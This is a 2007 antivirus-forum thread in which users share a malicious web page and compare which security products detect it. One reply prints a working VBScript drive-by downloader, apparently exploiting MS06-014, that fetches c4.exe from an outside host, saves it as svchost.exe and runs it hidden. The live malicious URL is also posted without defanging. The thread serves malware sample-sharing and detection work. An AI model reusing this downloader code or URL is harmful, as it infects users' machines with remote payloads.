查看: 1810|回复: 8
收起左侧

[病毒样本] 卡巴报一只,来自网上。。。。

[复制链接]
Whitlack
发表于 2007-4-5 19:31:44 | 显示全部楼层 |阅读模式
已检测: 木马程序 Trojan-Downloader.VBS.Small.dk URL: http://www.xiaoshuowang.com.cn/url.html


NOD32好像没反应

http://www.xiaoshuowang.com.cn/url.html
小邪邪
发表于 2007-4-5 20:03:05 | 显示全部楼层

mcafee(又是利用漏洞的)

2007-4-5        20:01:48       
已删除(清除失败)J\url[1].htm\00000024.vbs       
Exploit-MS06-014 (特洛伊)

2007-4-5        20:01:49        脚本执行被阻挡
http://www.xiaoshuowang.com.cn/url.html
由 IEXPLORE.EXE 执行的脚本       
Exploit-MS06-014 (特洛伊)
dikex
发表于 2007-4-5 20:29:24 | 显示全部楼层
on error resume next
    m1="object"
    m2="classid"
    m3="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
    m4="Microsoft.XMLHTTP"
    m5="Shell.Application"
    m6="Scripti"&"ng.Fil"&"eSystemObject"
    Set xasonc = document.createElement(m1)
    xason = "http://xiaoshuowang.com.cn/c4.exe"
    xasonc.setAttribute m2, m3
    xasoni=m4
    Set xasond = xasonc.CreateObject(xasoni,"")
    yhangf="Ado"
    yhangg="db."
    yhangh="Str"
    yhangi="eam"
    xasonf=yhangf&yhangg&yhangh&yhangi
    xasong=xasonf
    set xasona = xasonc.createobject(xasong,"")
    xasona.type = 1
    xasonh="G"&"E"&"T"
    xasond.Open xasonh, xason, False
    xasond.Send
    xason9="svchost.exe"
    set xasonb = xasonc.createobject(m6,"")
    set xasone = xasonb.GetSpecialFolder(2)
    xasona.open
    xason8="xasona.BuildPath(xasona,xason8)"
    xason7="xasonb.BuildPath(xasonb,xason7)"
    xason6="xasonc.BuildPath(xasond,xason6)"
    xason5="xasond.BuildPath(xasonf,xason5)"
    xason4="xasone.BuildPath(xasong,xason4)"
    xason3="xasonf.BuildPath(xasonh,xason4)"
    xason2="xasong.BuildPath(xasoni,xason3)"
    xason1="xasonh.BuildPath(xasong,xason1)"
    xason0="xasoni.BuildPath(xasonk,xason0)"
    xason9= xasonb.BuildPath(xasone,xason9)
    xasona.write xasond.responseBody
    xasona.savetofile xason9,2
    xasona.close
    set xasone = xasonc.createobject(m5,"")
    xasone.ShellExecute xason9,BBS,BBS,"o"&"p"&"e"&"n",0
小邪邪
发表于 2007-4-5 20:36:31 | 显示全部楼层


[ 本帖最后由 小邪邪 于 2007-4-5 20:38 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
沸沸
发表于 2007-4-5 20:38:18 | 显示全部楼层
红伞直接拒绝存取了。微点都没用上
harry_chang2003
头像被屏蔽
发表于 2007-4-5 21:18:54 | 显示全部楼层
PC-cillin 2007沒反應
The EQs
发表于 2007-4-5 22:09:26 | 显示全部楼层
nod32 found nothing
mofunzone
发表于 2007-4-5 23:06:03 | 显示全部楼层
Starting the file scan:

Begin scan in 'C:\TDDOWNLOAD\c4.exe'
C:\TDDOWNLOAD\
  c4.exe
      [DETECTION] Contains signature of the dropper DR/Click.Flyst.D.54
      [INFO]      The file was deleted!
lanvin
发表于 2007-4-5 23:18:19 | 显示全部楼层
我晕
楼主怎么不改成 hxxp
不小心给点开了......
hips防住了......
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-3-29 12:40 , Processed in 0.131021 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表